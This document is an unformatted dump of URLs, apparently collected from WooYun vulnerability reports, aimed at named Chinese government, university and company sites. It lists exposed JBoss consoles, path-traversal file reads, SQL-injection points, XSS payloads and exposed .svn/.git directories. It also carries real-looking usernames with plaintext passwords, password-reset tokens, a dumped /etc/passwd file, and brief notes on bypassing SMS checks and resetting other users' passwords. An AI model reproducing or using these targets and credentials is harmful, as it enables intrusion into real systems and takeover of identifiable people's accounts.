http://zj.189.cn/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F../ https://github.com/jnccClub/jnccinfo/blob/8b81d96d5719331388254fd0edcb94be23aa739c/src/main/resources/cfg/mail.properties http://oa.ahhr.com.cn/manage/Login.aspx http://hq.fruitday.com:88/login/Login.jsp?logintype=1 https://github.com/Moirai7/TYT/blob/f9b42524b93a9dc7b6d744ea69ab5dd89d545482/data/conf/config.php http://info.gnete.com/ http://zhuzher.vanke.com/uip/vhome/user/checkAccount.do是校验用户是否存在的请求。绕过这步点方法有两个: http://zhuzher.vanke.com/uip/messagesend/smsSend.do是短信校验码的请求, www.wooyun.org,结果后面就再也发不出短信了,I’m www.yczfgjj.com http://110.249.253.5:8000/provinceIndexAction.action http://110.249.253.5:8000/jmx-console/ http://210.14.78.250/db.rar http://www.hbcz.gov.cn:8080/arkcms/guestbook/index.jsp?site=null&siteID=8a8080820bb43e5a010bb478c73a062e&ID=98434 http://it.nwpu.edu.cn/login2.jsp?activityid=91 http://183.62.50.21:7777/Eisserver/ http://183.62.50.21:7777/jmx-console/ 
http://www.gzipo.gov.cn/admin/jsp/cms/content/content_manage_entity.jsp?parentEncode=001&orderField=cms_content.VERSION_ID&isDesc=Y http://pan.baidu.com/s/1kT02Dy3 http://www.sccom.gov.cn/xxfb/fbmanager/moInfo.do?info=33685 www.sjzjyhd.gov.cn http://www.sjzjyhd.gov.cn https://github.com/doloveme/coremailtest/blob/ca175b8b6b22aae8d57ae424288f5eab3ff23029/coremail/src/main/java/com/test/MyClass.java http://tuan.wl.cn/ http://hssskl.tju.edu.cn/teachers.asp?id=47  http://hssskl.tju.edu.cn/MainTain/ inurl:http://mail.miit.gov.cn:8080/login.php?F_authid= http://222.143.25.120:81/tjxt/pages/czy/login.jsp http://222.143.25.120:81/invoker/JMXInvokerServlet http://yun.zjer.cn/portal/index.php?a=init&c=help_search&catid=29&keywords=1%27%22&m=content&siteid=1 wecms.wecook.cn/User/index.html_ http://**.**.**/Admin/User/resetPwd/id/267157.html_ http://**.**.**/Admin/AuthManager/usergroup_name=%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E7%BB%84&group_id=8_ http://**.**.**/Config/edit/id/4.html_ http://140.207.254.30:81/itsm/ http://140.207.254.30:81/invoker/JMXInvokerServlet http://www.jj.hc360.com/ http://335882.m.weimob.com/webreserve/ReserveMyBook/rid/32639/wechatid/o91j7jjKmfaamfF5dIo5-EBJacdo 获取所有参与的信息,点击其中的链接可看到用户的详细资料,例如电话号,实名。并且可以随便随便修改用户的资料或取消用户参与的资格。使用户参与活动失效。严重的是数据信息可以轻易批量抓取到,让骗子可以用来行骗。 http://twy.zjedu.org/common/countStat.php?infoId=6540,注入点infoId http://twy.zjedu.org/common/info_list.php?page=0&colsn=002006000,注入点colsn http://www.gy.yn.gov.cn http://www.rgrcb.com/lxwm.php?class_id=184 http://**.**.**/ http://202.108.49.130/situjiaduotu.asp?formname=form2&editname=pic&uppath=xppic&filelx=xls http://**.**.**/xppic/yywlpic.asp http://222.42.53.23:81/ http://222.42.53.23:81/invoker/JMXInvokerServlet http://sljzw.hhu.edu.cn/fen/cata.aspx?type=75 http://sljzw.hhu.edu.cn/fen/showmore.aspx?newstype=2 http://sljzw.hhu.edu.cn/fen/cata.aspx?type com:443 https://mail.h isense.com/corem url:http://twy.zjedu.org/register.php http://182.151.205.225:88/?locale=zh_CN 
http://xnnrbz.xining.gov.cn/adduser.jsp http://www.scedu.net/user/print.php?mode=second&id=26345 http://bbs.gnete.com http://twy.zjedu.org/admin/admin.htm http://www.scbxyxtzypt.com:81/circbone/loginOnSign.action http://www.scbxyxtzypt.com:81/circbone/login.action http://www.scbxyxtzypt.com:81/circbone/login.action http://www.wandoujia.com/search?key=%E8%BD%A6%E6%98%9F%E4%BA%BA http://www.chinaz.com/start/2015/0313/389698.shtml http://chexr.cc/h/find.html联系车主这里有个功能,可以发信息,他会在APP和手机短信同时通知 http://182.151.205.225:81/ http://182.151.205.225:81/jmx-consoleing/ vip.septwolves.com/manage/web/index.php?app_act=club/user/member/order_detail&id=1 http://weixin.91160.com/index.php?c=user&a=login&time=1429448013 http://222.33.43.61/ http://110.249.129.242/Teacher/Index.aspx http://huiyuan.edu-pal.com/admin/ http://www.whaqjx.com/admin/login.aspx http://122.224.250.26:8182/ http://dhjx.1039.cn/Student/StudentLogin.aspx http://175.19.190.18:82/ http://218.58.52.102:83/Teacher/Index.aspx http://222.223.229.50:8080/Student/StudentLogin.aspx http://222.222.24.105:85/Student/StudentLogin.aspx http://219.145.135.190:88/Teacher/Index.aspx http://221.214.164.198:1039/Student/StudentLogin.aspx http://60.10.59.196:8090/Teacher/Index.aspx http://myjx.1039.net/Student/StudentLogin.aspx http://yueche.sjzxc.cn/ http://59.175.146.252/Teacher/Index.aspx http://182.92.70.91:270/Student/StudentLogin.aspx http://121.40.106.211:81/Student/StudentLogin.aspx http://211.157.186.169:8011/Teacher/Index.aspx http://www.zjkljjx.com/Teacher/Index.aspx http://wsyc.ybklzx.com/headmaster/HeadmasterLogin.aspx http://www.ylrsjt.com/Student/StudentLogin.aspx http://www.zljx.net:8080/Teacher/Index.aspx www.tybus.com http://portal.gdsgsafety.gov.cn:8080 https://portal.gdsgsafety.gov.cn:8443/cas/login?service=http%3A%2F%2Fportal.gdsgsafety.gov.cn%3A8080%2Fportal%2F http://portal.gdsgsafety.gov.cn:8080/invoker/JMXInvokerServlet https://portal.gdsgsafety.gov.cn:8443/invoker/JMXInvokerServlet 
http://chem.nenu.edu.cn/teacher_show.php?teacher_id=147&typeid=44 http://forum.open.com.cn http://forum.open.com.cn/admin http://forum.open.com.cn/admin/home/ www.gzszfgjj.com http://bbs.shiwan.com/bin/ajax_get_comment_list.php?flag=1&last_page=1&page=1&subject_id=1 http://222.143.53.129:8080/zzykt/ http://222.143.53.129:8080/admin-console http://222.135.76.130/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.sysfgj.com/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.jxanyifg.com/webbargain/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.jlxfdc.com:8308/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.ychfgj.com/ba/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.ahjsfdc.com:81/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://gpsfcgls.com/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.bzfcj.gov.cn:9090/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.lsfcj.com/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.zyfcj.com:81/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://61.134.55.211:8080/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://117.141.124.166/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.jxfgj.com:8081/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://ba.snajfdc.com:8888/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://61.184.26.226:8081/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.mcfcj.com:8080/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.suyufc.gov.cn/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://222.173.253.198:88/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://beian.ncfdj.gov.cn:8080/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.cpfgw.com/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://121.15.254.25/default.asp http://210.21.119.232:8080/Services/Settings/Settings.asmx/SaveAccountPassword 
http://119.145.135.183:8100/dzjxkh/loginform.action http://vip.ufida.com.cn/ssbu/SiteServer/login.aspx https://www.tongbupan.com/departs/members/list/?departid=5338629&page=1&numsperpage=30 https://www.tongbupan.com/contact/showdetail/?tabletype=group&email=test@domain.com http://61.151.247.130:8080 http://passport.766.com/login?service=http://www.766.com/?ticket=ST-6996-Edzj7XailWYezvZq1OeS-authentication&ticket=ST-7128-bNZ0rYza3n0LlSbF9AUV-authentication http://www.gzsjsjc.com/mainpage/home/OperPage.aspx?goURL=ZZGL/ZZGL_List.aspx?tp=1&CDID3=3&WEBMID=2&smid=2 http://122.227.225.98:8888/bill/bill_q.aspx http://61.174.22.102//bill/bill_q.aspx http://www.portever.com:10088/bill/bill_q.aspx http://kaseshanghai.com/bill/bill_q.aspx http://180.168.61.98:10088/bill/bill_q.aspx http://wangpan.baidu.com/wap/link?shareid=3085359792&uk=2772822685&third=1&dir=%2FK8%E7%B3%BB%E7%BB%9F&page=1& http://www.gdlawyer.gov.cn:92/ http://www.gdlawyer.gov.cn:92/flow?action=open&flowType=approvein&busyType=outer&&openType=outter&dataId=0000000000122100 http://www.apply.shu.edu.cn/sys/web/Notice http://c.ahedu.net/pages/common/Login.aspx ID:223726 ID:223727 http://bbs.shiwan.com/pub/ajax_members_list?page=1&pub_id=30 http://www.htccamp.cn/ewebeditor/admin/login.aspx http://www.htccamp.cn/ewebeditor/uploadfile/admin.aspx http://vip.ufida.com.cn/nccsm/HomePage.aspx http://i.chaoxing.com/ http://glxy.nwpu.edu.cn/mba/search?keyword=%E6%90%9C%E7%B4%A2 http://glxy.nwpu.edu.cn/mba/search?keyword=%E6%90%9C%E7%B4%A2 http://www.xueersi.com/user/editPwd/type:1/id:142774/code:7110c762d61a1c86b3155ff34d46cdb7。直接访问这个链接就可以跳转到填写新密码的地方。此处id可以遍历。code参数后面的参数随便写即可。然后会提示错误,通过google浏览器的元素审查功能,吧输入密码框的代码替换掉即可,然后点击提交就可以重置你刚才设置的密码: http://shop.lakala.com:8081/ http://admin.lakalaec.com/ http://221.214.92.88:5555/GED-0.5/ http://tools.2345.com/m/yulu/search.php?page=2&w=test* http://www.capub.cn:8888/ http://221.131.71.82/ http://css.lenovo.com//usesub.php http://css.lenovo.com/test/test.php 
http://css.lenovo.com/test.php http://admin.yingyu.com/Admin/Public/login.html http://221.214.5.70:8080/applicationAction.do?method=enterMain http://221.214.5.70:8080/invoker/JMXInvokerServlet http://bitqcby.bitnp.net/ http://bitqcby.bitnp.net/phpmyadmin http://bitqcby.bitnp.net/wp-admin/ http://coope.9588.com/hotel/hotel/brandhtml?CityCode=CGQ&random=10000 http://android.diy.moxiu.com/ http://android.diy.moxiu.com/proxy.php?url=图片路径 http://www.wooyun.org/bugs/wooyun-2015-0109119/trace/7957093bde0d5cfb655ac9166e3aa1c3 http://www.rhxwl.com/Server.asp http://www.sxpjgtmyjj.com/shop_index.asp?no=11 http://jh.zjmy.net/shop_index.asp?no=45 http://www.hyqmyjj.com/shop_index.asp?no=51 http://www.linhaihome.com/shop_index.asp?no=63 http://www.yhmyjj.com/shop_index.asp?no=21 http://www.sxjhjj.com/shop_index.asp?no=55 http://jh.zjmy.net/shop_index.asp?no=11 http://www.sxkfqjj.com/shop_index.asp?no=32 http://www.xsunion.com/shop_index.asp?no=35 http://www.lqmyjj.com/shop_index.asp?no=46 http://www.linhaihome.com/shop_index.asp?no=34 http://www.ttmyjj.com/shop_index.asp?no=42 http://www.sxjhjj.com/shop_index.asp?no=24 http://www.wlmyjj.com/wlmyjj/shop_index.asp?no=63 http://www.hyqmyjj.com/shop_index.asp?no=11 http://jh.zjmy.net/shop_index.asp?no=45的: http://www.sxpjgtmyjj.com/shop_index.asp?no=11的: http://www.hyqmyjj.com/shop_index.asp?no=51的: http://xjz.zjol.com.cn/xye/tlbb_login.aspx存在POST注入 http://luqiao.zjol.com.cn/user/login.aspx存在POST注入 http://luqiao.zjol.com.cn/user/index.aspx存在POST注入 http://luqiao.zjol.com.cn/user/login.aspx http://luqiao.zjol.com.cn/user/index.aspx http://www.sh10000.com.cn/sh10000.rar https://github.com/colincheng1016/LAUBE/blob/0eea31e20594ab42a561c46c49106b9a57550a8b/WebRoot/WEB-INF/eccom/config/mail.properties http://www.xzhouse.com.cn/news_con.aspx?id=16492 http://erp.zto.cn/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml jdbc:oracle:thin:@192.168.0.127:1521:erpdb http://nc.zto.cn/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml 
jdbc:oracle:thin:@192.168.0.127:1521:erpdb http://221.226.179.183:8080/ http://183.136.195.142/yyprojectaudit/login.action http://mintrust.minmetals.com.cn/wkxtweb/logincheck http://oa.wnq.com.cn/yyoa/ext/trafaxserver/SystemManage/config.jsp http://219.146.174.89/yyoa/assess/js/initDataAssess.jsp view-source:http://www.ssepec.net/yyoa/common/SelectPerson/reloadData.jsp http://oa.duowei.net.cn/yyoa/ext/trafaxserver/SystemManage/config.jsp http://oa.wnq.com.cn/yyoa/ext/trafaxserver/SystemManage/config.jsp http://brightoa.com/yyoa/ext/trafaxserver/SystemManage/config.jsp http://www.saptcom.net/yyoa/ext/trafaxserver/SystemManage/config.jsp http://oa.lzmc.edu.cn/yyoa/ext/trafaxserver/SystemManage/config.jsp http://220.175.15.105:8080/jxDangerousChemicalsMgt/ http://220.175.15.105:8080/invoker/JMXInvokerServlet http://220.175.15.105:8080/myname/index.jsp http://222.134.130.228:8080/oa/ http://222.134.130.228:8080/dx_baoxian/ http://222.134.130.228:8080/yxgl/ http://222.134.130.228:8080/admin-console http://www.lntu.edu.cn/post_detail1.asp?id=xxx http://bbs.shiwan.com//bin/ajax_get_subject_list.php?order_by=1&&tag_id=0&page=1&pub_id=48 http://www.rhxwl.com/Server.asp http://jh.zjmy.net/index.asp?lhlx=%BD%F0%BB%AA http://www.sxpjgtmyjj.com/index.asp?lhlx=%C5%DB%BD%AD http://www.linhaihome.com/index.asp?lhlx=%C1%D9%BA%A3 http://www.hyqmyjj.com/index.asp?lhlx=%BB%C6%D1%D2 http://www.yhmyjj.com/index.asp?lhlx=%D3%F1%BB%B7 http://www.sxjhjj.com/index.asp?lhlx=%BE%B5%BA%FE http://jh.zjmy.net/index.asp?lhlx=%BD%F0%BB%AA http://www.sxkfqjj.com/index.asp?lhlx=%C9%DC%D0%CB%BF%AA%B7%A2%C7%F8 http://www.xsunion.com/index.asp?lhlx=%CF%F4%C9%BD http://www.lqmyjj.com//index.asp?lhlx=%BB%C6%D1%D2 http://www.linhaihome.com/index.asp?lhlx=%C1%D9%BA%A3 http://www.ttmyjj.com/index.asp?lhlx=%C1%D9%BA%A3 http://www.sxjhjj.com/index.asp?lhlx=%C1%D9%BA%A3 http://www.wlmyjj.com/wlmyjj/index.asp?lhlx=%CE%C2%C1%EB http://www.hyqmyjj.com/index.asp?lhlx=%BB%C6%D1%D2 
http://jh.zjmy.net/index.asp?lhlx=%BD%F0%BB%AA的: http://www.sxpjgtmyjj.com/index.asp?lhlx=%C5%DB%BD%AD的: http://www.linhaihome.com/index.asp?lhlx=%C1%D9%BA%A3的: http://222.143.26.105:8080/HaSaltMis/ http://222.143.26.105:8080/jmx-consoles/ http://222.66.170.182:8080/main/login.jsp http://222.66.170.182:8080/jmx-console/ http://qqc.yangchongren.com//install/install.php http://wallpaper-sogou.open.moxiu.net/json.php?do=Album.Show&id=20159 http://my.gfan.com http://www.jsychrss.gov.cn https://jf.ffan.com/ http://www.ahetyy.com/config.php cn:3306 inurl:zpsys post:ZJHM http://zhaopin.wmu.edu.cn/zpsys/zssc/deletePhoto.jsp?SCLJ=1 http://zhaopin.wmu.edu.cn/zpsys/resume/resumeinfo.jsp?txsm=%E4%BB%8E%E9%AB%98%E4%B8%AD%E5%A1%AB%E5%86%99%E8%B5%B7&IsreadOnly=no http://www.appstar.com.cn/ http://www.appstar.com.cn/store/6791.htm?share_uid=2015042006636 http://www.xueersi.com/user/editPwd/type:1/id:142767/code:d31b01946f009f718948a854d14254cb code:d31b01946f009f718948a854d14254cb code:1c574569a925f741bf280481900127b4 code:7110c762d61a1c86b3155ff34d46cdb7 http://220.191.230.219:8080/rkk/pop.html http://220.191.230.219:8080/DonGz/ http://220.175.15.105:8080/jiangxiETL/ http://220.175.15.105:8080/jiangxiETL/accessory.do?method=showImage&path=E:\jboss-4.2.2.GA\server\default\.\deploy\jiangxiETL.war\userImage\admin.jpg http://220.175.15.105:8080/jiangxiETL/accessory.do?method=showImage&path=E:\jboss-4.2.2.GA\server\default\.\deploy\jiangxiETL.war\WEB-INF\web.xml http://cai.myfund.com/UserCenter/platform/PerCenter.aspx?UserName=15110677515 http://zone.wooyun.org/content/15953 http://cai.myfund.com/UserCenter/platform/PerCenter.aspx?UserName=15110677515 http://m.myfund.com/lshb.aspx?code=000008 http://zone.wooyun.org/content/15953 http://www.minshengec.com/ http://118.145.13.124/ http://baa.bitauto.com/drive/admin/ http://int.ems.com.cn/ http://value.17wo.cn/resource/value17wo/LoginForm.action http://value.17wo.cn/Form/css/xx.jsp http://value.17wo.cn/Form/css/xx.jsp 
http://www.dlpu.edu.cn http://masini.chuchujie.com/shareret.php?nid=600 http://www.10futu.com http://www.taiwantaxi.com.tw/taiwantaxi.zip http://vote.zj.com/vote.cgi?option=results&topic=3543 http://www.xdyg.com.cn/manage/Admin_Chk.asp http://www.xdyg.com.cn/manage/ http://blog.zzedu.net.cn/WebResource.axd?d=1429096122 http://iclass.zzedu.net.cn/space.jsp?uid=28127 http://blog.zzedu.net.cn/admin.aspx http://xy.zzedu.net.cn http://xxws.zzedu.net.cn http://218.28.2.97 http://218.28.2.99 http://218.28.2.96 http://ls.zzedu.net.cn http://mbjy.zzedu.net.cn http://www.zzstxx.com http://zzstxx.com http://news.zzedu.net.cn http://ztc.zzedu.net.cn http://bjz.zzedu.net.cn http://expo.zzedu.net.cn http://www.zzedu.net.cn www.zzedu.net.cn】 http://www.zzjy.gov.cn www.zzjy.gov.cn】 http://xsgl.zzedu.net.cn http://www.zetv.com.cn http://xwjy.zzedu.net.cn http://yywz.zzedu.net.cn http://yjzx.zzedu.net.cn http://zzjydd.zzjy.gov.cn http://jys.zzedu.net.cn http://zizhu.zzedu.net.cn http://zdj.zzedu.net.cn http://jks.zzedu.net.cn http://wgzj.zzedu.net.cn http://jdsd.zzedu.net.cn http://ggw.zzedu.net.cn http://school.zzedu.net.cn http://qjb.zzedu.net.cn http://jlxh.zzedu.net.cn http://kgw.zzedu.net.cn http://study.zzedu.net.cn http://kszx.zzedu.net.cn http://gzztc.zzedu.net.cn http://xly.zzedu.net.cn http://tyj.zzedu.net.cn http://xxzx.zzedu.net.cn http://zydj.zzedu.net.cn http://mail.zzedu.net.cn http://zz47.com http://zz47z.zzedu.net.cn http://www.zz47.com http://hhzx.zzedu.net.cn http://218.28.2.111 http://www.etfjijin.com/etfjijin.com.rar http://www.hewuyuan.com/web.rar http://www.hewuyuan.com/Manage_JobAdd.asp http://www.hewuyuan.com/Manage_JobAdd.asp http://www.hewuyuan.com/new.asp?id=1 Url:http://m.fruitday.com/login http://m.fruitday.com http://s.wanda.cn/ http://www.10futu.com/.svn/entries http://pro.jushanghui.com/ http://pro.jushanghui.com http://www.cwan.com/zt/ktpd_hd/vote.php http://www.haitiansoft.com:8080/ http://180.166.7.94/ckeditor/tupianadd.asp 
http://www.shhjwl.com/vos/ckeditor/tupianadd.asp http://www.shcz.net/VOS/ckeditor/tupianadd.asp http://dfoa.shhjwl.com/ckeditor/tupianadd.asp http://www.cnshuiyu.com/ckeditor/tupianadd.asp http://www.m6go.com/my/Baby.do http://www.jsmedia.cn/About/About_2.html http://passport.jsmedia.cn/User_GetPassword.asp?Reg_Site=2&ComeUrl=http%3A%2F%2Fwww%2Eczfcw%2Ecom%2F&GotoUrl= http://z.yirendai.com/sell http://gcuser_2810804.cn.gongchang.com/ http://ops.ikang.com/cgi-bin/test-cgi http://www.myfund.com/simu/fitem.aspx?code=* URL:http://www.myfund.com/fundselect/jijinjingli.aspx?managerid=* http://www.scqsm.org.cn/bbs/index.asp http://mail.scqsm.org.cn和mail.cqsm.org.cn,存在账号密码相同的弱口令,登录内部邮件服务器 http://218.85.72.90:8080/irpt/i/oem/wsb/index.jsp http://share.erya100.com http://i.mooc.chaoxing.com/settings/info http://mail.3wcoffee.com/ http://share.erya100.com http://i.mooc.chaoxing.com/settings/info http://123.138.182.14/console/loginExit/loginExit_DG3!login.action http://218.106.246.156:8080/admin/login.web http://hd.ifeng.com:8082/cgi-bin/test-cgi www.37.com,然后可以看到登陆的地方是没有验证码限制的 http://59.50.114.19/home.action http://mail.yongyou.com/wapmail/index.action http://game.tom.com/pay/.svn/entries http://122.91.252.110/usercfg/user_exitLogin.do http://122.91.252.110/usercfg/user_exitLogin.do http://59.79.251.1/jdbysj/stu_main.asp http://210.51.46.173/auth/login http://szc.fruitday.com/doc/page/main.asp http://121.31.60.232:8080/BSS/recaptcha.action?operNo=12345678901&random=1429081636365 http://www.yundaex.us/ www.yundaex.us/member/zhekouma.aspx?m=12 www.yundaex.us/Member/GuanShuiList.aspx?m=17 http://mooc.chaoxing.com/erya http://mooc.chaoxing.com/erya/error http://ptr.chaoxing.com/coursecontroller/factors?newCourse=true http://**.**.**/index.php/Transtion/showpthuzhao/Id/*****_ http://**.**.**/index.php/Transtion/showpthuzhaofan/Id/*****_ http://**.**.**/_ http://**.**.**/admin/_ http://www.xtuan.com/.svn/entries http://www.tijiangz.com/showsuit.php?hos_id=1 
http://**.**.**/wsfw/wscgs/(此为跳转页面非注入页面)_ http://**.**.**/cgs/jsp/main/news.jspnewsId=20111228193954921&cgsId=8aea92bd3474119c01347447f21200cd_ http://buy.gongchang.com/ http://219.131.221.59:8080/ http://219.131.221.59:8080/jmx-console http://skypearl.csair.com/ http://www.hn165.com/mobapps/detail/appid/23 http://www.mldwedu.cn/ IP:60.31.190.148 http://localhost/www/admin.php?m=package&f=obtain http://localhost/www/admin.php?m=package&f=install&package=hellochanzhi&downLink=aHR0cDovL3d3dy5jaGFuemhpLm9yZy9leHRlbnNpb24tYnV5RXh0LTEtZG93bmxvYWQuaHRtbA==&md5=093632e563a4911d6f26d3c876aaf4dc&type=extension&overridePackage=no&ignoreCompatible=yes&overrideFile=no&agreeLicense=yes&upgrade=no http://www.chanzhi.org/extension-buyExt-1-download.html http://localhost/www/admin.php?m=package&f=install&package=aaa&downLink=aHR0cDovL2xvY2FsaG9zdC9zYi56aXA=&md5=&type=extension&overridePackage=no&ignoreCompatible=yes&overrideFile=no&agreeLicense=yes&upgrade=no http://localhost/sb.zip http://121.41.119.34:8080/weiconsole/login.action http://www.coremail.cn/gjzc2/list_117.aspx?lcid=412 inurl:fund.eastmoney.com/?pwd、 http://fund.eastmoney.com/?uname=331081198708159423&pwd=Sqq@2014 http://fund.eastmoney.com/?uname=15098811062&pwd=714098amanda http://fund.eastmoney.com/?uname=13952799848&pwd=20080113 http://fund.eastmoney.com/?uname=13309145111&pwd=13309145111 http://fund.eastmoney.com/?uname=18505088830&pwd=bbdwd1204 http://fund.eastmoney.com/?uname=15605318651&pwd=laji568184 http://fund.eastmoney.com/?uname=15207332668&pwd=xubing0604 http://fund.eastmoney.com/?uname=13599916102&pwd=605471172seantim http://fund.eastmoney.com/?uname=15731219922&pwd=vv5201314 http://219.153.125.65:8080/oa/login/login/loginOff.action http://219.153.125.65:8080/oa/login/login/loginOff.action jboss-4.2.2.GA/server/default/./deploy/oa.war jboss-4.2.2.GA/bin jboss-4.2.2.GA/bin/run.jar http://219.153.125.65:8080/oa/login/login/loginOff.action jboss-4.2.2.GA/server/default/./deploy/oa.war/ 
http://rd.baosteel.com/ProjectMM/check.weizh http://61.152.151.203:8001/manager/html root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/dev/null daemon:x:2:2:daemon:/sbin:/dev/null adm:x:3:4:adm:/var/adm:/dev/null lp:x:4:7:lp:/var/spool/lpd:/dev/null sync:x:5:0:sync:/sbin:/dev/null shutdown:x:6:0:shutdown:/sbin:/dev/null halt:x:7:0:halt:/sbin:/dev/null mail:x:8:12:mail:/var/spool/mail:/dev/null uucp:x:10:14:uucp:/var/spool/uucp:/dev/null operator:x:11:0:operator:/root:/dev/null games:x:12:100:games:/usr/games:/dev/null gopher:x:13:30:gopher:/var/gopher:/dev/null ftp:x:14:50:FTP User:/var/ftp:/dev/null nobody:x:99:99:Nobody:/:/dev/null dbus:x:81:81:System bus:/:/dev/null vcsa:x:69:69:virtual owner:/dev:/dev/null rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/dev/null abrt:x:173:173::/etc/abrt:/dev/null rpcuser:x:29:29:RPC User:/var/lib/nfs:/dev/null nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/dev/null haldaemon:x:68:68:HAL daemon:/:/dev/null ntp:x:38:38::/etc/ntp:/dev/null saslauth:x:499:76:"Saslauthd saslauth:/dev/null postfix:x:89:89::/var/spool/postfix:/dev/null sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/dev/null tcpdump:x:72:72::/:/dev/null oprofile:x:16:16:Special OProfile:/home/oprofile:/dev/null admin:x:0:0::/home/admin:/bin/bash useradmin:x:500:10::/home/useradmin:/bin/bash imcc:x:501:501::/home/imcc:/bin/bash http://mirror.qyer.com/shell/ http://mirror.qyer.com/conf/ http://219.131.221.59:8080/ http://219.131.221.59:8080/download.fe?filePath=/WEB-INF/web.xml http://219.153.125.65:8080/oa/index.html http://219.153.125.65:8080/oa/fileUpload/fileUploadDemo/download.action?filePath=/usr/jboss-4.2.2.GA/server/default/./deploy/oa.war/WEB-INF/web.xml&fileName=web.xml http://219.153.125.65:8080/oa/fileUpload/fileUploadDemo/removeFile.action?filePath=/usr/jboss-4.2.2.GA/server/default/./deploy/oa.war/js/editorjs/attached/20150421232925677_326.jsp inurl:http://chaxun.neea.edu.cn/examcenter/recerti.cn?op=doApp&loginName= 
http://chaxun.neea.edu.cn/examcenter/recerti.cn?op=doApp&loginName=chaorentw@qq.com&pwd=chaoren http://chaxun.neea.edu.cn/examcenter/scoreprint.cn?op=doLoginSystem&login_system_type=cet http://chaxun.neea.edu.cn/examcenter/recerti.cn?op=doApp&loginName=chuanzimo@126.com&pwd=chew,4you www.shxme.com http://shxme.com/api/php.php http://www.yaofang.cn/a/user/findPwd inurl:http://fanxing.kugou.com/username http://fanxing.kugou.com/1042179?username=lvbolong&password=scope123&sm=&login_btn= http://fanxing.kugou.com/?username=%E5%94%AF%E4%B8%80deWT&password=123456&sm= http://fanxing.kugou.com/1013217?userName=%E6%AE%87%E9%9B%A80123&password=1192675775&repassword=1192675775&code=TIPOM®_btn= http://fanxing.kugou.com/?username=唯一deWT&password=123456&sm= https://github.com/haryzhou/zeta/blob/2c4b4aa7cd16d8e4745e8cf1de9d17ccf1c95a5a/lib/Zeta/Mailer/Simple.pm http://202.194.176.30:8080/index.action http://oa.gd.sina.com.cn/login/check_login http://diy.hicdma.com/index.jsp inurl:http://passport.secoo.com/findPassword/findpass3.jsp?userName= http://passport.secoo.com/findPassword/findpass3.jsp?userName=13352522789&sign=64629973412A8DA41C6AA3FBAF2E76BF http://passport.secoo.com/findPassword/findpass3.jsp?userName=18611832868&sign=7C4E692A6F8A663B372002DA635DE7EA http://bxzd.bj12345.gov.cn:8080/bsic_internet/publicQuestionMgt_publicQuestionMgt.action http://crpe.ruc.edu.cn/CN/article/searchArticle.do http://123.232.113.241/bcis/Login.aspx http://123.232.113.241/bcis/Login.aspx http://www.myuios.com/.git/config http://test.myuios.com/phpinfo.php http://116.213.142.202/medicalManager/ http://116.213.142.202/medicalManager/news/adminCheck.jsp http://116.213.142.202/medicalManager/js/news/adminCheck.js http://www.skywldh.com/reg/reg.html inurl:http://www.hotelgg.com/member/getpassword?code= http://www.hotelgg.com/member/getpassword?code=41a989327fcbb1ff6SEXOmuM9cNSIyu4ISsFeE0cjOhcvXnULLTE6A5DxnXZPYpFIjBnVYQfuwoEDu9bBm60Fwk&email=298168099@qq.com 
http://www.hotelgg.com/member/getpassword?code=010af237e4f1370fWfdT47UpFMiLGsdWC6k%2FPt0p4FNwftajvhXrQM%2BWumS%2BNz2r%2FsQAr2JCIeLfCWSGxTDGTHk&email=644328887@qq.com http://www.hotelgg.com/member/getpassword?code=e185a6271158e68bO5RdIywh%2B7GMZTRwSVxXSyqqWb%2FopwiNILlMtuqo8Elb0xJGDL5hfq%2Fkp5EBzH5MUKujPMzi&email=daihuan@cnhnb.com http://www.hotelgg.com/member/getpassword?code=e185a6271158e68bO5RdIywh%2B7GMZTRwSVxXSyqqWb%2FopwiNILlMtuqo8Elb0xJGDL5hfq%2Fkp5EBzH5MUKujPMzi&email=daihuan@cnhnb.com http://www.hotelgg.com/member/getpassword?code=010af237e4f1370fWfdT47UpFMiLGsdWC6k%2FPt0p4FNwftajvhXrQM%2BWumS%2BNz2r%2FsQAr2JCIeLfCWSGxTDGTHk&email=%3Cscript%3Ealert%28%22%22%29%3C/script%3E%3C http://www.hotelgg.com/member/getpassword?code=010af237e4f1370fWfdT47UpFMiLGsdWC6k%2FPt0p4FNwftajvhXrQM%2BWumS%2BNz2r%2FsQAr2JCIeLfCWSGxTDGTHk&email= http://www.keepc.com/reg/reg.html http://acm.sdut.edu.cn/sdutoj/compile.php?solutionid=184746 http://s.chinapaid.net/forgetpassword.action http://www.bhedu.com.cn:8041/ http://120.197.24.136:8080/verify/login http://acm.sdut.edu.cn/sdutoj/setting.php?userid=17737 http://bbs.chexun.com/3g/view.php?tid=702562 http://mall.grcbank.com/TopMallWeb/newpage/login/login.jsp?returnURL=%22%3E%3C/script%3E%3Ciframe/onload=alert%281%29%3E http://mall.grcbank.com/TopMallWeb/clientAction!mentionAddress.action?oper=custAddInfo http://mall.grcbank.com 